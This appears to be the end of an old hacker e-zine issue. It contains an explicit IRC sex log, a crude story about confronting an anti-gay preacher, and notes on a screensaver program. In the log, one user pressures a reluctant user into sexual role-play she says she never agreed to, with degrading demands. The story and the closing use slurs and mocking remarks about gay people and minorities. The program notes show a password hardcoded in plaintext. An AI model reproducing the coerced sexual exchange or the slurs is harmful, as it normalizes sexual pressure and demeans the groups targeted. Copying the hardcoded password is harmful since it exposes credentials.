<sek> THIS IS GAY
<comp4ct> you have to.
<comp4ct> du0d
<comp4ct> and you can't tell a fucking story
<sek> :\
<comp4ct> wtf
<sek> i wasn't done
<comp4ct> you gotta describe it like u were doing it to me
<comp4ct> jesus
<sek> why?
<sek> i'm not doing it to you
<comp4ct> tahtz what cyber head is
<comp4ct> tahtz what cyber head is
<comp4ct> tahtz what cyber head is
<sek> i haven't done it to you
<sek> and i prolly won't even ever meet you
<comp4ct> du0d
<sek> sigh
<comp4ct> will u just do it
<sek> fine :\
<comp4ct> use /me
<comp4ct> or something
<comp4ct> but make it sound like erotic
<sek> i hate you. :\
<comp4ct> HEH
<comp4ct> oh well.
<comp4ct> your end of the bargain.
<sek> I didn't even agree
<sek> i said i would think about it
<comp4ct> wtf
<comp4ct> you said "FINE"
<comp4ct> meaning "ok i will"
<comp4ct> meaning "yes"
<comp4ct> making it an affirmation of your agreement.
<sek> OK
<comp4ct> now do it
<sek> WHATEVER
<comp4ct> fucking op everyone you deopped
ð sek kneels between your legs and unzips your pants
<comp4ct> yeah
ð sek pulls out your dick and starts to play with it
<comp4ct> keep going... ..
ð sek licks the very tip of it, and runs her tongue down to the very bottom
<comp4ct> jea.
ð sek sucks a little on the head of your dick
ð sek begins to move her mouth up and down slowly, deepthroating
ð sek starts to move a little faster
<comp4ct> word.
ð sek waits until you cum in her mouth, then pulls back and swallows
<sek> there, happy? :\
<comp4ct> no
<comp4ct> keep going
<sek> SIGH
<comp4ct> im not a minute man!
<sek> why not?
<sek> i'm done :\
<comp4ct> um
<comp4ct> ur done when like i say ur done
<sek> there is only so much you can describe over irc
<comp4ct> thats the way it works heh
<comp4ct> u can get more descriptive
<comp4ct> think of new creative ways
<comp4ct> before i lose th1z m4ss1ve er3ct10n
<sek> sigh
<sek> er, you got hard from that?
<comp4ct> no.
<comp4ct> thasts the problem!@#$
<comp4ct> i should get
<comp4ct> hard from that
<sek> hahah
<comp4ct> now then
<comp4ct> start g1bing head
<sek> eep, my bf just got on irc
<sek> future bf, anyways :P
<comp4ct> i dont care
<comp4ct> this chan is +s
<comp4ct> now then.
<sek> hm
<sek> i do, i'm talking to him :\
<comp4ct> well
<comp4ct> just give me some more cyber head
<comp4ct> and dont tell h1m
<comp4ct> or if u wish ill tell him
<comp4ct> HEH.
<comp4ct> i dont care.
<sek> i thought i did a decent job of giving head over irc :\
<comp4ct> u gotta finish your part of the agreement.
<comp4ct> you did
<comp4ct> but ur not done yet.
<sek> you don't even know who he is
<sek> well how much more can i say?
<comp4ct> just keep talking about u giving me head
<comp4ct> using /me
<comp4ct> and get real descriptive about it
<comp4ct> and dont finish till i say its done
<comp4ct> jeesh
<sek> i dunno how much more i can say :\
<sek> i like to deepthroat
<comp4ct> just start over
<comp4ct> and instead of finishing
<sek> sigh
<comp4ct> keep going
<comp4ct> how hard iz that.
<comp4ct> hEh.
<sek> I have no clue what to say though!
<comp4ct> make stuff up as u go along.
<comp4ct> like ab0ut my long koq and stuff hEH!
<sek> haha
<sek> i dunno if its that long though ;)
<comp4ct> yeah well
<comp4ct> just start over
<comp4ct> and keep going
<comp4ct> and ill um cheer u on from 'above'
<comp4ct> heh3ha
<sek> hahaha, my future-bf just called you a "fuqn wanker"
<sek> bwahaha
<comp4ct> heh.
<comp4ct> well
<comp4ct> fuqn start!
<comp4ct> u gotta finish ur end of the deal jesus chr1st.
<sek> fine
ð sek sighs
<sek> i did
<sek> i gave you irc head
<comp4ct> um
<comp4ct> not really
<comp4ct> it lasted like what 15 seconds/
<comp4ct> irc head is technically at least 4 minutes long last i checked
<comp4ct> irc head rfc HEH
<sek> um, actually i did :\
<comp4ct> just start over and do it again, god damnit.
<comp4ct> heh this is great.
<sek> i can't help it if i can't be that descriptive
<comp4ct> well do it again.
<sek> i dunno what to say
<comp4ct> try harder.
<comp4ct> just imagine what u'd do irl !
<comp4ct> then describe it
<sek> er
<comp4ct> heh.
<sek> sigh
<sek> fine
<comp4ct> word
<comp4ct> more irc head.
<comp4ct> th1z iz to elite.
ð sek starts to play with your dick with her fingers, rubbing your head a little
<comp4ct> h3h.
ð sek puts your whole dick in her mouth, and sucks softly
ð sek moves up, and starts to suck on just your head
ð sek runs her tongue over your dick, flicking it softly
<comp4ct> damn
ð sek deepthroats again, and sucks hard
<comp4ct> and she s4id she didn't know how HEHh
<comp4ct> boy u like deepthroating alright.
<comp4ct> h4hahj
<comp4ct> th1z is elite
ð sek shrugs
<sek> guys seem to like it
<sek> and i'm good at it
<comp4ct> k. onward.
<sek> also, if a guy cums in my mouth and i'm deepthroating, i don't taste it :P
<comp4ct> k.
<comp4ct> onward.
<comp4ct> l4nd h03.
ð sek sucks a little harder, and rotates her head a little
ð sek puts some poprocks in her mouth, and sucks a little more
<sek> hEH
<comp4ct> wtf
<comp4ct> dat would burn
<sek> no
<comp4ct> suq a little harder be0tch
<sek> it doesn't
<comp4ct> jea
<comp4ct> well onward ho!
<sek> kinda like ice
<comp4ct> t1ngly
<comp4ct> heh
<comp4ct> continue!
<comp4ct> btw what size cup do u wear
<comp4ct> hEH.
<sek> 36D
<sek> why?
<comp4ct> 36d?
<comp4ct> wow
<comp4ct> EH
<sek> did gr1p give you new.jpg? :\
<comp4ct> no.
<sek> ok.
<comp4ct> haven't seen him in a few dayz
<comp4ct> now continue
ð sek starts to move her head a bit faster, and suck a bit harder
<comp4ct> this is where i grab da back of ur head hEH
<sek> ds just came up here
<comp4ct> ds/?
<sek> datashark
<comp4ct> so
<comp4ct> continue!
<comp4ct> hEH
<sek> er
<sek> fine
ð sek tongues your dick as she sucks
<comp4ct> d4mn skippy.
ð sek moves even faster, sucking harder
<comp4ct> jea b1tch
<comp4ct> t3ll m3 h0w u luv it wh3n i gr4b ur h4ir and force u d33per
<comp4ct> HEH
<sek> er
<comp4ct> TELL m3
<comp4ct> h3h
ð sek is deepthroating already :P
ð sek can't go any deeper
END - comp4ct = elite - END
---------------------------------------------------------------[revolution]
How I literally got kicked out of the Eastern Baptist Church
by schemerz
Disclaimer : Incidents included are all fictitious in nature due to the
shady recollection process after smoking a little bit too much hash. Gewf
was pressing for shtuff and I had to give him something, and these
incidents were funny, at least as I remember it. These accounts are
somewhat factual, somewhat not, so I decided just to change the names and
make it safe in case I get anything horribly wrong.
Eastern Baptist Church is located in Topuka, the capital of the state
Kansas. It's not a really big church, but they get in the news a lot.
Most of the time they leave their tact at home and picket funerals and
concerts, most recently the funeral of Mathew Sheppard. (I think they
are too chicken to picket the rob zomebie and korn concert in KC last
night, kick ass concert btw, but that's another article... :) They are
also responsible for web sites such as www.goddetestsfags.com. So they
are really a fun bunch. Rush Limbough would have been proud.
Reverend Fred Felps heads the crowd, who was a lawyer in a previous life,
until one of his sons got out of the closet. Fred Felps then runs to the
nearest Warmart to purchase a really bad white robe and calls himself a
preacher. After being thrown out of the Southern Baptist Church because
of his faggot hating ways, he started his own church, the Eastern Baptist
Church, which basically runs out of his own house along with 20-30 family
members and close friends. They get supported by a lot of white power
parties too. Although not all of the family is predominantly prejudiced,
I have had the pleasure of meeting his grandson, Ben Felps, who happens to
be a graduate student doing computer science at University of Kansas. Ben
admins most of his granddaddy's sites, including of course yours truly.
Enough with the background. I have to explain why I had the urge of
seeing one of these sermons of Fred, if not fucking it up and causing some
serious mayhem:
Almost 3 years ago I arrived in Kansas fresh off the boat, as they would
say, after having a less than stellar high school career somewhere in South
East Asia. Shortly after arriving into the university and being shipped
off to this smelly little dorm room, I was introduced to Sam my new
roommate. He drove me around, showing me stuff and I got to know him very
well. We were just kicking it one weekend in September and started
watching the tele, when channel 6 was doing a special of a concert held at
a local community college. Turns out this composer was dying of AIDS,
and someone was holding a concert in his name for being the talent as he
is. (I can't remember this dood's name, but I remember listening to some
of his stuff on the local university radio now. Truly a talent.) Caught
out of the corner of the camera there were these doods holding up signs
with slogans like "Anal Sex=Aids=Death", "Gay=Death of Ethics=Death of
America" and of course, "God detests fags!". I was thoroughly bewildered
at the sight of such signs, and proceeded to bug Sam about it. Shit like
this at home just does not fly. It's not like Asians have a strong tolerance
of homosexuals or racial diversity, but they keep it to themselves and
have the politeness to withhold their opinion at times of mourning, such
as a concert displaying one's work as one dies of AIDS. Being the fuckwit
18 year old that I was, I suggested to Sam that we would head over and see
one of their sermons and check out their reasoning, because neither of us
can make any logical sense out of Fred's websites. So we called the
church up, asked if it was an open sermon coming up. We stated that we
weren't gonna cause trouble, and putting on my fakest British accent,
asked if we could attend. We were of course declined the opportunity,
since it was a closed church.
Being the dumb motherfucker sam can be sometimes, we decided to crash the
party instead. (He's getting married to the least sensible woman on this
planet in a month, so WATCH OUT FOR DA KIDS)
So we hopped into his girlfriend's car (btw we chatted this woman up no more
than one week before, and now three years later sam is fucking marrying
the woman... good god... time has passed QUICKLY... oh and she lent him
the car... Megan is so fucking cool, prolly cause Sam is such a fucking
pimp), and drove to Topuka. We arrived at the church shortly before the
sermon began, and walked in, saying we are looking for Ben. Ben came out
shortly, trying to cover his blood soaked ass, saying that his granddad
was holding a sermon. We talked a bit, commenting a little about the
upside down American flag hanging outside the church. He said he would
attend to us shortly after the sermon. I put on the largest puppy dog
eyes I could muster, and asked *very* politely if I can attend the
sermon. Since he was a TA in one of my computer science lab classes, he
was sure I wasn't going to pull any shit.
We got in, sat on a seat. The living room was packed, and Sam was kinda
chickening out a little... "Maybe we shouldn't be here dood..." Little did
I know he was one of the most articulate arguers I was ever gonna meet :)
So the sermon went, the usual church shit, yahdayahdayahda... the hymns,
the prayers and all that... until about 45 minutes later Sam woke me
from deep slumber when Fred started preaching the evils of homosexuality.
People started asking questions as he spoke, and he answered quite
logically. The man was a lawyer I thought, most of them, like my dad,
have a knack of conveying one side of reasoning and made it all
encompassing. So I held up my hand, to which I was asked to speak.
"Reverend Felps, I am new here, in this church and in this country. I
don't quite understand why you seem to direct all your problems at one
social group who a) pay more taxes per capita than most other minorities,
b) are probably more educated as well ? How can any group contributing to
the government and society in such a way be considered harmful ?"
He muttered something ridiculous like telling me to get a haircut, which
was when Sam (he's got hair down to his ass... I learned never ever to
talk any shit about long hair around him) stood up and started his
rhetoric :)...
"Mr Felps, I would like to know why you are so proliferic about your
projections on to gay people. It is quite entertaining, humorous even,
that you would chose to broadcast your inner id feelings towards
homosexuals on national television. "
Most people got the joke, and gave us the evilest look they could muster.
I must say most people would have backdowned and shut up at this point,
but Sam, oh Sam... what can I say... Anyways, Mr Felps professed that he
did not know what Sam meant.
Sam : "Mr Felps, would you like to answer my friend's question as to why
you are targeting one of the more successful groups of minorities of this
country ?"
Felps : "I happen to think their lifestyle is a harmful influence to our
youth in this country. I also happen to perceive that this country is
being overran by faggots. Is there no more decency in this country ?"
(applause by his crowd)
"Mr Felps, as I recall correctly, the american society is firmly
capitalist, meaning that each individual's success is based upon one's
wealth. how would the lifestyle of a homosexual, one of success, good
education and wealth be questionable to the youth? "
Felps : "As *I* recall correctly, the american society is firmly CHRISTIAN
based. It is because of non-believers such as these homosexuals, that the
youth today stem from the faith. That, is why I am opposed to them."
Me : "But was it not in the new Testament itself that states that we
should love our neighbours ?"
Felps : "Ummmmm... Are you familiar with the book of Sodom ?"
Sam : "Yes I am, and I am familiar with this line of argument. You would
state that the book of sodom states quite clearly that male-male sexual
activities are forbidden and the only male-female copulation is deemed
allowable by god. You would also state that the bible FIRMLY states that
sex is a sacred act of god, and people should not abuse this power. You
will also lead into the argument right here that AIDS and other sexually
transmitted diseases were the repercussion of these acts."
Felps : "You read my mind son. How would you choose to refute these
claims. I am of course a man bound by faith, so please keep any
arguments of the bible's validity to yourself. "
Sam : "Okay... Homosexuality has been documented long since roman times.
How come aids were to come around now?"
Felps : "There are other sexual transmitted diseases that god has
dispensed in his fury upon this planet. Unfortunately the devil has made
the faggot strong in his ways, and they have not been disuaded."
Me : "How about this ? It is nearly medically impossible for lesbians to
contract aids. If god indeed tried to make AIDS as a means of dissuading
homosexuality, why are a) more heterosexuals affected ? b) why did he
leave half the faggots off the list ? "
Felps : "God is not fair, he chose to punish the whole of humanity for the
crimes of the faggots. I have taken up the task of god to disuade all of
humanity against the ways of faggots. Lesbians are evil too."
One of us : "You still have not answered the questions we posed, could you
please answer them now ? "
Felps : "I have answered them son. God has other diseases to weaken his
enemy. Aids is only one piece in his arsenal. Gonorrhea, syphilis, etc
etc all attack sexually indecent men and women in some way or another."
One of us : "Alright fair enough, how about this... If a person who is
not sexually promiscuous, then it is very unlikely that he or she gets
infected with anything correct ? Is it possible that your god wants to
dissuade his people away from promiscuous sex ? Has he not made a
distinction between acts of love and acts of passion before ?"
Felps :"God has made it very clear that sexual acts outside of wedlock are
forbidden. "
Me :"Mr Felps, where does it exactly in the bible say that wedlock has to
be between a man and a woman ?"
Felps : (stammers some unintelligible... me and sam exchange evil
grinning looks...)
Me : "As a matter of fact, where in the bible does it define the man and
the woman entity, biologically and psychologically ? If this premise is
not made, then all your arguments against homosexuality are up to
question."
Someone in the crowd : "How is that ?"
Sam : "Well it is quite easy to see that a gay couple can be enacting both
the male and female parts of the relationship. With legislation allowing
homosexuals to marry in Hawaii it is perfectly ethical for gays to be in
bounds of christianity and still copulate. No ?"
Someone in the crowd : (something like you fags or faggot loving
liberals... something dumb like that... think it was Ben. )
Someone else in the crowd : (Leave if you don't like what we have to say,
We don't like you anyways.)
Sam : "We are merely discussing the rhetoric in the bible, I personally
made no attacks towards the validity of the good book, neither did my
friend here. "
Some bitch in the crowd : "Shut up you people are full of it as it is!"
Me : "We were merely discussing with the *beloved* reverend the various
interpretations of the bible over a fine comb."
We were asked to leave anyways :) In fact, we didn't leave quite yet
until Sam got his answers from his questions. Sorely to say we were
rather discouraged with our journey towards the interpretations of the
bible. I personally ditched the cross and became a taoist instead.
Oh well... Fred was beaten up in the middle of Kansas City one day when
he was picketing somewhere near the Plaza. HEH it was a sight to behold.
He's wrong. I am right. HAHA
-!- -!- -!- -!- -!- -!- -!- bsaver overview -!- -!- -!- -!- -!- -!- -!- -!-
-i- -i- -i- -i- -i- -i- -i- -i- -i- -i- -i- -i- -i- -i- -i- -i- -i- -i- -i-
This little program, based off of Qytpos drugz2.c, has been turned into a
lovely ncurses screen saver. Nice words, derogatory words, and most
importantly; dill monkey words come up -- It's fun for the whole family.
We / I decided to just store the password in this line here.
static char passwd[] = "dillmonkey" ;
if you can code just a teeny bit, you can change this to a macro. did i
mention teeny? We also thought that perhaps you might want to accept a
password via something prompting for a password at each session. Such
might be accomplished by:
static char passwd[20];
...
printf("Enter password to use: ");
/* %19s: 19 characters plus the terminating NUL fit the 20-byte buffer */
scanf("%19s", passwd);
but the problem is, if you forget, you might as well reboot. Also, you can
have it saved in perhaps a file .bsaver and open, fgets() from it, but
remember the character length has to be 20! You can also merely use the
passwd structure and use your login password via crypt() etc. Anyways, the
code is yours to edit. If there are any problems, mail me at comp4ct@hotmail.com
p.s. don't abuse getch. Hit Enter *ONE TIME* to get a password prompt.
NOTE: If you have any minorities in your office / household, i would not
run this program in front of them. It may lock your console, but if they
see what's popping up, you could be fired / flogged. But isn't that the
b4b0 way?
Good Day,
cp4kt
Special thanks to: Matt Conover (Shok of w00w00) for his great article on
console ioctls. The macros used to lock console were taken from there.
Thank you.
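As an added example (not part of bsaver or the original article), here is one way to do the prompt and .bsaver options from the overview above with a bounded read: fgets() into the 20-byte buffer, over-long lines rejected, and a comparison that does not stop at the first wrong character. The function names read_passwd and passwd_equal are hypothetical, and the one-line plaintext layout of .bsaver is an assumption.

```c
#include <stdio.h>
#include <string.h>

#define PASSWD_MAX 20   /* buffer size from the article, NUL included */

/* Read one line from fp into buf. Returns its length (1..19), -1 on EOF
 * or an empty line, -2 if the line does not fit; the rest of an over-long
 * line is drained so it is not taken for the next attempt. */
int read_passwd(FILE *fp, char buf[PASSWD_MAX])
{
    size_t n;
    int c, extra = 0;
    if (fgets(buf, PASSWD_MAX, fp) == NULL)
        return -1;
    n = strcspn(buf, "\n");
    if (buf[n] != '\n')                 /* no newline: EOF or over-long */
        while ((c = getc(fp)) != EOF && c != '\n')
            extra = 1;
    if (extra) {
        memset(buf, 0, PASSWD_MAX);
        return -2;
    }
    buf[n] = '\0';
    return n ? (int)n : -1;
}

/* Compare without stopping at the first mismatch (inputs: at most 19 chars). */
int passwd_equal(const char *a, const char *b)
{
    char pa[PASSWD_MAX] = {0}, pb[PASSWD_MAX] = {0};
    unsigned char diff = 0;
    int i;
    strncpy(pa, a, PASSWD_MAX - 1);
    strncpy(pb, b, PASSWD_MAX - 1);
    for (i = 0; i < PASSWD_MAX; i++)
        diff |= (unsigned char)(pa[i] ^ pb[i]);
    return diff == 0;
}

/* Exit status: 0 on a match, 1 on a wrong attempt, 2 if .bsaver is unusable. */
int main(void)
{
    char stored[PASSWD_MAX], typed[PASSWD_MAX];
    FILE *fp = fopen(".bsaver", "r");   /* file name from the article */
    if (fp == NULL || read_passwd(fp, stored) < 0)
        return 2;                       /* no usable stored password */
    fclose(fp);
    fputs("Password: ", stderr);        /* stderr is unbuffered */
    return !(read_passwd(stdin, typed) > 0 && passwd_equal(stored, typed));
}
```

The password in .bsaver is still stored in the clear here; the crypt() route mentioned in the overview avoids that.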
-/- -/- -/- -/- -/- -/- -/- -/- -/- -/- -/- -/- -/- -/- -/- -/- -/- -/-
Closing up..
WELP, THATS IT. Hope you enjoyed this totally k-sp1ff, extraordinarily
diverse issue of BABO! Please send many submissions to us for b4b0 8.
submissions@b4b0.org | Comments and questions go to letters@b4b0.org
Your editor, ph1x.
######## ######## ########
## ## ## ##
######## ## ## ########
## ## ## ##
######## ######## ##
* IN THE NEXT EXCITING EPISODE OF B4B0, SAT AND ACT ANSWERS WILL BE GIVEN!
* NOT TO MENTION OUR COPY OF ALIEN AUTOPSY PORNAGRAPHY STARRING JONATHAN
* FRAKES WILL BE UUENCODED AND DISTRIBUTED.
UNTIL THEN, STAY TUNED!